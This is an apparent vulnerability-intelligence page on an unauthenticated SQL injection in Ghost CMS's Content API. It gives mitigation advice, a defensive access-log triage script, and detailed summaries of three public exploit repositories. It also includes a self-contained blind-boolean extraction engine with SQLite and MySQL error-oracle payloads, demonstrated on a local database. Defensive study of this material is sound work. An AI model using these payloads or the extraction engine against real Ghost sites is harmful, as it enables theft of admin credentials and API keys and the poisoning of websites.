SQL Injection in Ghost Content API
CVE-2026-26980 is a SQL injection vulnerability in the Content API of Ghost, the Node.js content management system. Affected versions are 3.24.0 through 6.19.0. The flaw lets an unauthenticated remote attacker trigger arbitrary reads from the backend database via crafted Content API requests. The vulnerable path is the Content API's query handling, specifically filter processing, and exploitation can expose sensitive records including the Ghost Admin API key. With that key in hand, an attacker pivots from database disclosure to unauthorized use of the Admin API and can alter site content.
Impact, mitigation & remediation
Mitigation
slug%3A%5B or slug:[, with the caveat that blocking these strings may disrupt legitimate slug-filter functionality. Because the Content API key is public by design, restricting that key does not mitigate the vulnerability. Additional defensive steps reported include monitoring for unusual bulk PUT or other Admin API requests and scanning site content for known malicious script patterns.

Remediation
Patch, then assume compromise.
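Part of the assume-compromise step is checking whether the oracle probing or Admin API abuse described under Mitigation has already happened. The following is an added example, not code from the page's sources or from Ghost: it parses constructed nginx-style access log lines, flags Content API requests whose filter parameter decodes to a slug array (the same `slug:[` string the WAF rule keys on, so legitimate multi-slug filters match too), and then looks for the two patterns a practitioner would act on: one client sending many such requests with a mix of 200 and 500 responses, which is what an error-based oracle looks like from the server side, and a burst of PUT/POST/DELETE calls to the Admin API. The Admin API prefix `/ghost/api/admin/`, the thresholds, and the sample log lines are assumptions made for the example.

```python
"""Added example: triage a Ghost front-end access log for the two things the
mitigation section says to watch for. Parsing assumes nginx "combined" format;
the Admin API prefix (/ghost/api/admin/) and the two thresholds are assumptions,
not values from the advisory. The log lines are constructed, not captured traffic."""
import re
from collections import Counter, defaultdict
from urllib.parse import parse_qs, unquote, urlsplit

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"$'
)
CONTENT_API = "/ghost/api/content/"
ADMIN_API = "/ghost/api/admin/"   # assumed Admin API prefix
ORACLE_MIN_REQUESTS = 20          # assumed: legit clients rarely send this many slug-array filters
ADMIN_WRITE_BURST = 5             # assumed: this many Admin API writes from one client is unusual


def parse_line(line):
    """Split one combined-format line into ip/method/path/query/status, or None."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"], rec["query"] = parts.path, parts.query
    rec["status"] = int(rec["status"])
    return rec


def has_slug_array_filter(query):
    """True when a `filter` parameter contains `slug:[` after URL-decoding.
    This is the same string the WAF rule keys on, so legitimate multi-slug
    filters match too; it is a trigger for the per-client checks, not proof."""
    return any("slug:[" in unquote(v).lower() for v in parse_qs(query).get("filter", []))


def triage(log_text):
    slug_hits, per_ip_status, admin_writes = [], defaultdict(Counter), Counter()
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        if rec["path"].startswith(CONTENT_API) and has_slug_array_filter(rec["query"]):
            slug_hits.append((rec["ip"], rec["path"], unquote(rec["query"]), rec["status"]))
            per_ip_status[rec["ip"]][rec["status"]] += 1
        if rec["path"].startswith(ADMIN_API) and rec["method"] in ("PUT", "POST", "DELETE"):
            admin_writes[rec["ip"]] += 1
    # Blind-oracle probing is one client sending many slug-array requests; with an
    # error-based oracle the status codes are a mix of 200 (no error) and 500 (error).
    oracle_suspects = {ip: dict(st) for ip, st in per_ip_status.items()
                       if sum(st.values()) >= ORACLE_MIN_REQUESTS}
    admin_bursts = {ip: n for ip, n in admin_writes.items() if n >= ADMIN_WRITE_BURST}
    return {"slug_hits": slug_hits, "oracle_suspects": oracle_suspects, "admin_bursts": admin_bursts}


def _line(ip, method, target, status, ua="python-requests/2.31"):
    return f'{ip} - - [10/Mar/2026:08:00:00 +0000] "{method} {target} HTTP/1.1" {status} 512 "-" "{ua}"'


# Constructed sample: one browser doing normal reads, one client running an
# error-based oracle against /tags/ and then writing posts through the Admin API.
SLUG_FILTER = "/ghost/api/content/tags/?key=k&filter=slug%3A%5Bbacon%2Cchorizo%5D"
SAMPLE_LOG = "\n".join(
    [_line("198.51.100.4", "GET", "/ghost/api/content/posts/?key=k&filter=tag%3Anews", 200, "Mozilla/5.0"),
     _line("198.51.100.4", "GET", SLUG_FILTER, 200, "Mozilla/5.0")]
    + [_line("203.0.113.7", "GET", SLUG_FILTER, 200 if i % 2 else 500) for i in range(24)]
    + [_line("203.0.113.7", "PUT", f"/ghost/api/admin/posts/{i:024x}/", 200) for i in range(6)]
)

if __name__ == "__main__":
    result = triage(SAMPLE_LOG)
    print("oracle suspects:", result["oracle_suspects"])
    print("admin write bursts:", result["admin_bursts"])
```

The single slug-array request from 198.51.100.4 is reported in slug_hits but never becomes a suspect, which is the point of the per-client threshold: the raw string match is too noisy to block on or alert on by itself, but a client that repeats it dozens of times with alternating status codes, and then starts writing through the Admin API, is the sequence this CVE's exploitation produces.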
Exploits
Three exploit repositories are listed below, after filtering out fakes, detection scripts, and README-only repos.
This repository is a self-contained exploit lab and PoC for CVE-2026-26980, an unauthenticated SQL injection in TryGhost Ghost CMS Content API filter handling. It ships a Docker-based environment that installs Ghost 6.19.0, seeds a SQLite database with a known public Content API key and oracle tags, and a Python exploit script that abuses the public /ghost/api/content/tags/ endpoint.

Repository structure: Dockerfile builds a vulnerable Ghost 6.19.0 lab on port 9102; docker-entrypoint.sh starts Ghost, waits for readiness, and seeds the database with branding, a fake flag table, a static Content API key, and two public tags (bacon and chorizo) used as an oracle; patch-source-theme.sh modifies the default Ghost theme for lab branding; poc.py is the main exploit; README.md documents the vulnerability, setup, and usage.

Exploit behavior in poc.py: it sends GET requests to /ghost/api/content/tags/?key=<key>&filter=<payload>, where condition_filter() crafts the filter to inject SQL into the slug:[...] ordering logic. The relative order of the returned tags serves as a boolean oracle: if the injected condition is true, bacon is returned first; if false, chorizo is. On top of this primitive the script implements value_length() and count_rows() with binary search, and recover_value_by_prefix() for character-by-character extraction. It targets the users, settings, and api_keys tables and demonstrates extraction of the admin email, admin name, admin API key ID, and admin API secret. This is a working exploit PoC rather than a detector. It does not attempt code execution; its capability is database enumeration and arbitrary value extraction via blind boolean SQLi over a public, unauthenticated web endpoint, given a public Content API key.
This repository is a self-contained lab and operational PoC for CVE-2026-26980, an unauthenticated blind SQL injection in Ghost CMS Content API slug filter ordering. It targets Ghost CMS versions prior to 6.19.1 and demonstrates blind SQLi-based database disclosure over HTTP. The exploit is not tied to a common framework.

Repository structure (5 files): README.md explains the vulnerability, affected and fixed versions, exploitation method, and usage examples. docker-compose.yml provisions two Ghost environments for testing, vulnerable Ghost 6.18.0 on localhost:2368 and fixed Ghost 6.19.1 on localhost:2369, each backed by MySQL 8. exploit.py is the primary entry point and contains the exploit logic, CLI, hardcoded lab credentials, and HTTP interactions with the Ghost Admin and Content API endpoints. requirements.txt lists requests. validate.sh installs dependencies, starts both containers, runs the exploit against the vulnerable instance, validates the fix against the patched instance, and optionally tears down the lab.

Exploit behavior: the main capability is unauthenticated arbitrary database read from affected Ghost instances by abusing the public Content API key and injecting SQL through slug array ordering. The script automates target readiness checks, optional Ghost setup/login for the local lab, retrieval or use of a Content API key, verification of the boolean oracle, and blind extraction of sensitive values. The oracle relies on a crafted slug payload using CASE WHEN ... THEN 0 ELSE EXP(710) END, so that a true condition returns HTTP 200 while a false condition evaluates EXP(710), overflows MySQL's DOUBLE range, and produces HTTP 500. By default the script extracts the admin email; optionally it extracts the admin bcrypt hash and admin API secret. A validation mode confirms the fix on patched versions. Overall, this is a working exploit PoC with practical extraction capability rather than a simple detector.
This repository is a small standalone Python exploit for CVE-2026-26980, described as an unauthenticated SQL injection in Ghost CMS's public Content API leading to arbitrary database reads. It contains five files: a GPL license, a README with usage and lab instructions, the main exploit script (`main.py`), a minimal dependency file (`requirements.py`, named like a Python module rather than the conventional `requirements.txt`), and a Docker Compose lab for Ghost 6.16.1 with MariaDB. The core logic is entirely in `main.py`.

Exploit behavior: the script first requests the target homepage and scrapes the `data-key` and `data-api` values from the HTML. It then queries the public `tags` API endpoint to obtain a valid tag slug and ID, which it uses to build a vulnerable `filter=slug:[...]` request template. The injection is a blind boolean oracle that intentionally triggers a database error when the tested condition is true: on SQLite via integer overflow from `abs(-9223372036854775808)`, on MySQL via `exp(710)`. Success is detected by searching the HTTP response body for `badrequesterror` or `InternalServerError`. Using this oracle, the exploit performs bitwise length inference and binary-search character extraction, with a thread pool for concurrent extraction to speed up blind exfiltration. In default mode it performs reconnaissance against common Ghost tables (`users`, `members`, `api_keys`, `sessions`) and extracts high-value secrets: the first admin email, admin name, password hash, admin API key ID, and admin API secret. In table-dump mode it can enumerate record counts and dump arbitrary rows from a specified table. For SQLite it additionally queries `sqlite_master` to recover schema SQL and infer column names; for MySQL, column handling is more heuristic and defaults to common fields.

The exploit is operational rather than a mere proof of concept: it contains end-to-end discovery, oracle calibration, multithreaded extraction, and table dumping. It is not part of a larger exploit framework. One code-quality issue: `main.py` references `textwrap.dedent` in the CLI epilog without importing `textwrap`, which raises a NameError at runtime unless corrected. Despite that bug, the intended exploit behavior and capabilities are clear from the code.
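All three PoCs turn a single yes/no oracle into full value recovery, and the engine on top of the oracle is the same whether the yes/no signal is tag ordering (first repository) or error-versus-success (second and third). The following is an added example, not code from any of the repositories or from Ghost: a minimal blind-boolean extraction engine run against a constructed in-memory SQLite schema, with the oracle simulated locally by splicing the condition into a CASE expression whose TRUE branch evaluates `abs(-9223372036854775808)`, the SQLite overflow trigger the third repository uses (`exp(710)` is the MySQL counterpart; the payload builder covers both dialects but only the SQLite path executes here). The table and column names and the secret values are invented for the demo, and the oracle is a local query rather than an HTTP request.

```python
"""Added example: a blind-boolean SQL injection extraction engine run against a
local, constructed SQLite database rather than a Ghost instance. The oracle is
simulated in-process: the attacker-controlled condition is spliced into a CASE
expression whose TRUE branch raises a database error (abs() of the most negative
int64 on SQLite, exp(710) on MySQL), mirroring the error-based oracle described
in the PoC write-ups. Table/column names and secret values are invented here."""
import sqlite3

DB = sqlite3.connect(":memory:")
DB.executescript("""
CREATE TABLE users (id TEXT, name TEXT, email TEXT, password TEXT);
CREATE TABLE api_keys (id TEXT, type TEXT, secret TEXT);
INSERT INTO users VALUES ('1', 'Alice Admin', 'alice@example.test', '$2a$10$constructedhash');
INSERT INTO api_keys VALUES ('k1', 'content', 'public-content-key');
INSERT INTO api_keys VALUES ('k2', 'admin', 'c0ffee1234abcd');
""")
ORACLE_CALLS = 0  # one oracle question == one HTTP request against a real target


def error_probe_sql(cond, dialect="sqlite"):
    """Wrap a boolean condition so that TRUE raises a database error (HTTP 500 at
    the API) while FALSE evaluates cleanly (HTTP 200). CASE evaluates lazily, so
    the overflow only fires when the condition holds."""
    bomb = {"sqlite": "abs(-9223372036854775808)", "mysql": "exp(710)"}[dialect]
    return f"CASE WHEN ({cond}) THEN {bomb} ELSE 0 END"


def oracle(cond):
    """Simulated oracle: True iff the condition made the database error out."""
    global ORACLE_CALLS
    ORACLE_CALLS += 1
    try:
        DB.execute(f"SELECT {error_probe_sql(cond, 'sqlite')}").fetchone()
    except sqlite3.OperationalError as exc:
        if "overflow" in str(exc):
            return True
        raise  # any other error means the payload itself is broken
    return False


def search_max(predicate, hi):
    """Binary search for the smallest n in [0, hi] with oracle(predicate(n)) true.
    predicate(n) must be monotone, i.e. of the form '<unknown> <= n'.
    Costs about log2(hi) oracle calls regardless of the answer."""
    lo = 0
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(predicate(mid)):
            hi = mid
        else:
            lo = mid + 1
    return lo


def count_rows(table, where="1=1", max_rows=1 << 20):
    return search_max(lambda n: f"(SELECT count(*) FROM {table} WHERE {where}) <= {n}", max_rows)


def value_length(scalar_sql, max_len=4096):
    return search_max(lambda n: f"length({scalar_sql}) <= {n}", max_len)


def recover_value(column, table, where="1=1", max_codepoint=255):
    """Recover one cell character by character. substr() is 1-indexed in SQLite and
    unicode() returns the code point of the first character; the 0..255 bound is an
    assumption that the value is Latin-1/ASCII (raise it for wider text, one call per bit)."""
    cell = f"(SELECT {column} FROM {table} WHERE {where} LIMIT 1)"
    length = value_length(cell)
    return "".join(
        chr(search_max(lambda n, i=i: f"unicode(substr({cell}, {i}, 1)) <= {n}", max_codepoint))
        for i in range(1, length + 1)
    )


if __name__ == "__main__":
    print("api_keys rows:", count_rows("api_keys"))
    print("admin secret :", recover_value("secret", "api_keys", "type='admin'"))
    print("admin email  :", recover_value("email", "users"))
    print("oracle calls :", ORACLE_CALLS)
```

With the 0..255 code-point bound each character costs eight oracle calls and the length inference about twelve, so a 14-character secret is roughly 125 requests and a bcrypt hash a few hundred; ORACLE_CALLS after the run is the request volume a real attacker would have generated against the tags endpoint, which is why per-client request counts on that endpoint are the signal worth monitoring.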
Recent activity
132 sources tracked across advisories, community write-ups, and news.
A SQL injection vulnerability in Ghost CMS that was used to compromise legitimate web infrastructure and inject malware loaders into more than 700 domains.
A critical SQL injection in Ghost CMS that lets an unauthenticated attacker read data from the database, obtain the administrator API key, and then fully compromise the administrative API to inject malicious code into sites.
A critical unauthenticated SQL injection vulnerability in Ghost CMS that affects versions 3.24.0 through 6.19.0 and can be used to steal admin API keys, gain elevated privileges, and inject malicious JavaScript into website content.
A high-risk unauthenticated SQL injection vulnerability in Ghost CMS that allows attackers to read the database, extract the Admin API Key, and use the Ghost Admin API to mass-modify site content, enabling large-scale website poisoning and malware delivery.